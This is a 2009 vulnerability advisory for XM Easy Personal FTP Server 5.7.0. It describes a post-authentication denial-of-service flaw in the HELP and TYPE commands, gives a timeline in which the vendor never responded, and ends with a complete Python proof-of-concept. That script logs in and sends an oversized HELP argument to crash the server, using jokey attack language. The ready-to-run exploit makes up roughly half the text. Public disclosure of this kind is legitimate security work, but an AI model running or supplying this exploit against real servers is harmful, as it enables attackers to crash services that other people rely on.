XM Easy Personal FTP Server Multiple DoS vulnerabilities Credits: NeerajT of Nevis Labs http://www.nevisnetworks.com/services.php?id=10 Date of Discovery: 14-May-2009 Vendor: Dxmsoft URL: http://www.dxm2008.com/ Affected: XM Easy Personal FTP Server 5.7.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication. Details: The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible. Severity: High Solution: No patches available from vendor No workaround is available at this time Vendor Communication Timelines: 05.14.2009 - Vulnerability Discovered 05.15.2009 - Vendor Notified 05.20.2009 - No Response, Vendor Notified again 06.05.2009 - No Ack from Vendor, Public Disclosure PoC: Python Exploit ----------------------------------------------------- #!/usr/bin/python # # ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com] # # [-] What:....[ XM Easy Personal FTP Server 5.7.0 ]..... # [-] Where:...[ http://www.dxm2008.com ]................ # [-] When:....[ 14-May-2009 ]........................... # [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ].... # [-] How:.....[ # A Denial of service vulnerability exists in XM # Personal FTP Server that causes the application to # crash when a long list of arguments is sent to # certain FTP commands post authentication..........] # [-] Thankz:..[ Jambalaya, Xin and Chintan ]............ import os import sys import time from ftplib import FTP def usage(): print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]" print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n" print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n" print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n" # The Main function starts here.. if __name__ == "__main__": ftpport = '21' # get the args.. if len(sys.argv) < 3: usage() sys.exit(1) ftpserver = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] print "Connecting to "+ftpserver+" using "+user+"....", # Try opening a connection to the FTP server try: F = FTP(ftpserver) F.timeout = 3 if F: print 'Connected !' except: print "\nCould not connect to the Server :(\n" sys.exit(1) #Lets create the Buffer.. crap = "A" * 5000 # Creat'in da'bomb dabomb = 'HELP '+crap print "Press any key to login.." ch = sys.stdin.read(1) # Lets login try: F.login(user, passwd) except: print "Oops.. Looks like you forgot to create a login !!\n" F.quit() sys.exit(1) print "Target Locked, Press any key to fire..", ch = sys.stdin.read(1) print 'Sendin Da\'Bomb..' try: F.sendcmd(dabomb) except: print 'Target destroyed !! Mission successfull..!' print 'Returning to base..' F.close() sys.exit(0) -----------------------------------------------------
